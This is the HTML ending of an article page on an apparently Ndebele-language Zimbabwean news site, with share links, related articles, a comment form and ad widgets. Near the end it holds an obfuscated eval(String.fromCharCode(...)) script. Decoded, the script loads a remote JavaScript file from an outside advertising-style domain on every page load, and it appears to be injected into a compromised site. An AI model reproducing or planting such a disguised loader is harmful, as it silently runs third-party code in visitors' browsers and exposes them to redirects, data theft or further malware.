                    <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://www.umthunywa.co.zw/i-nac-ingena-kunguqu-kulwiswa-ingculazi-ngebhola/&amp;media=http://www.umthunywa.co.zw/wp-content/uploads/2018/02/pG-15-hiv-league-2.jpg" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-pinterest"></div><div class="td-social-but-text">Pinterest</div></a>
                </div></div>                        <div class="wpb_row row-fluid next-prev"><div class="span6 prev-post"><div><img width="6" class="td-retina" src="http://www.umthunywa.co.zw/wp-content/themes/Newspaper/images/icons/similar-left.png" alt=""/>Previous article</div><a href="http://www.umthunywa.co.zw/umusa-ukhombisa-inokel-security/">UMusa ukhombisa iNokel Security</a></div><div class="span6 next-post"><div>Next article<img width="6" class="td-retina" src="http://www.umthunywa.co.zw/wp-content/themes/Newspaper/images/icons/similar-right.png" alt=""/></div><a href="http://www.umthunywa.co.zw/amazinyo-du-kubangwa-ubabhemi/">Amazinyo du kubangwa ubabhemi</a></div></div>            <div class="author-box-wrap"><a href="http://www.umthunywa.co.zw/author/schiwanga/"><img alt='' src='http://1.gravatar.com/avatar/456fe9bd3e816d58812bcc4642690494?s=106&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/456fe9bd3e816d58812bcc4642690494?s=212&#038;d=mm&#038;r=g 2x' class='avatar avatar-106 photo' height='106' width='106' /></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="http://www.umthunywa.co.zw/author/schiwanga/">Umthunywa Online</a></span></div><div></div><div class="td-author-social"></div><div class="clearfix"></div></div></div>

            <meta itemprop="author" content = "Umthunywa Online">        </footer>

    </article> <!-- /.post -->

    <div class="art-img-text-down similar-articles"><h4 class="block-title"><span>SIMILAR ARTICLES</span></h4>

	<div class="wpb_row row-fluid">

	<div class="span6">

        <div class="td_mod6 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://www.umthunywa.co.zw/injetshane-zikamadinda-zidanela-kumohadi/" rel="bookmark" title="‘Injetshane’ zikaMadinda zidanela kuMohadi"><img width="326" height="159" itemprop="image" class="entry-thumb" src="http://www.umthunywa.co.zw/wp-content/uploads/2017/12/MOHADI-326x159.jpg" alt="" title="‘Injetshane’ zikaMadinda zidanela kuMohadi"/></a></div>        <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.umthunywa.co.zw/injetshane-zikamadinda-zidanela-kumohadi/" rel="bookmark" title="‘Injetshane’ zikaMadinda zidanela kuMohadi">‘Injetshane’ zikaMadinda zidanela kuMohadi</a></h3>
        <div class="meta-info">
                        <time  itemprop="dateCreated" class="entry-date updated" datetime="2018-03-01T00:05:59+00:00" >Mar 1, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/>            <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="http://www.umthunywa.co.zw/injetshane-zikamadinda-zidanela-kumohadi/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-17210">21</span></div>        </div>


        <meta itemprop="author" content = "Umthunywa Online">        </div>

        
	</div> <!-- ./span6 -->

	<div class="span6">

        <div class="td_mod6 td_mod_wrap " itemscope itemtype="http://schema.org/Article">
        <div class="thumb-wrap"><a href="http://www.umthunywa.co.zw/umusa-ukhombisa-inokel-security/" rel="bookmark" title="UMusa ukhombisa iNokel Security"><img width="326" height="159" itemprop="image" class="entry-thumb" src="http://www.umthunywa.co.zw/wp-content/uploads/2015/03/Musa-Mandaza-326x159.jpg" alt="" title="UMusa ukhombisa iNokel Security"/></a></div>        <h3 itemprop="name" class="entry-title"><a itemprop="url" href="http://www.umthunywa.co.zw/umusa-ukhombisa-inokel-security/" rel="bookmark" title="UMusa ukhombisa iNokel Security">UMusa ukhombisa iNokel Security</a></h3>
        <div class="meta-info">
                        <time  itemprop="dateCreated" class="entry-date updated" datetime="2018-03-01T00:02:44+00:00" >Mar 1, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/>            <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="http://www.umthunywa.co.zw/umusa-ukhombisa-inokel-security/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-17203">23</span></div>        </div>


        <meta itemprop="author" content = "Umthunywa Online">        </div>

        
	</div> <!-- ./span6 --></div><!--./row-fluid--></div>
                        <div class="comments" id="comments">
                                                                                                <div class="comments-title-wrap">
                                                                                <h4 class="block-title"><span>NO COMMENTS</span></h4>
                                    </div>

                                                                                            	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/i-nac-ingena-kunguqu-kulwiswa-ingculazi-ngebhola/#respond" style="display:none;">Cancel reply</a></small></h3>			<form action="http://www.umthunywa.co.zw/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
				<div class="clearfix"></div><p class="comment-form-input-wrap"><textarea class="needsclick" placeholder="Comment:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea></p><p class="comment-form-input-wrap">
            <span class="comment-req-wrap needsclick"><input class="" id="author" name="author" placeholder="Name:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
            <span class="comment-req-wrap needsclick"><input class="" id="email" name="email" placeholder="Email:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap needsclick">
            <input class="" id="url" name="url" placeholder="Website:" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='17199' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>			</form>
			</div><!-- #respond -->
	                                                    </div> <!-- /.content -->


                </div>
                <div class="span4 column_container td-post-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
                    <aside class="widget widget_text">			<div class="textwidget"><a class="twitter-timeline" href="https://twitter.com/UMthunywa" data-widget-id="569852228983615488">Tweets by @UMthunywa</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+"://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></div>
		</aside><aside class="widget widget_text">			<div class="textwidget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Ad_Kwayedza_300 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-3993920789177136"
     data-ad-slot="2420765202"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
		</aside>                </div>
            
                             </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
            <div class="td-footer-wrap">
        <div class="container">
            <div class="row">
                
                            <div class="span12">
                                <div class="td-grid-wrap">
                                    <div class="container-fluid">
                                        <div class="wpb_row row-fluid ">
                                            <div class="span4 wpb_column column_container">
                                                                                            </div>

                                            <div class="span4 wpb_column column_container">
                                                                                            </div>
                                            <div class="span4 wpb_column column_container">
                                                                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                                    </div>
        </div>
    </div> <!-- /.td-footer-wrap  -->



<div class="td-sub-footer-wrap">
    <div class="container ">
        <div class="row">
            <div class="span12">
                <div class="td-grid-wrap">
                    <div class="container-fluid">
                        <div class="row-fluid ">
                            <div class="span4 td-sub-footer-copy">
                                &copy; Zimpapers LTD 1980                            </div>
                            <div class="span8 td-sub-footer-menu">

                                                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>


</div>
<!--/#inner-wrap-->
</div>
<!--/#outer-wrap-->

<div class="td-sp td-scroll-up"></div>



    <!--

        Theme: Newspaper by tagDiv 2014
        Version: 4.6.1 (rara)
        Deploy mode: deploy
        
        uid: 5a981971eae16
    -->

    <script type="text/javascript">eval(String.fromCharCode(118, 97, 114, 32, 116, 115, 114, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 32, 116, 115, 114, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 32, 116, 115, 114, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 97, 100, 115, 46, 108, 111, 99, 97, 116, 105, 111, 110, 102, 111, 114, 101, 120, 112, 101, 114, 116, 46, 99, 111, 109, 47, 112, 46, 106, 115, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 116, 115, 114, 41, 59))</script><script type='text/javascript' src='http://www.umthunywa.co.zw/wp-content/plugins/adrotate/library/jquery.clicktracker.js?ver=0.6'></script>
<script type='text/javascript' src='http://www.umthunywa.co.zw/wp-content/themes/Newspaper/js/td_external.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://www.umthunywa.co.zw/wp-content/themes/Newspaper/js/full_compact/site.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://www.umthunywa.co.zw/wp-includes/js/wp-embed.min.js?ver=4.9.3'></script>
<script type='text/javascript' src='http://www.umthunywa.co.zw/wp-includes/js/comment-reply.min.js?ver=4.9.3'></script>

<!-- JS generated by theme -->

<script>
    
</script>

</body>
</html>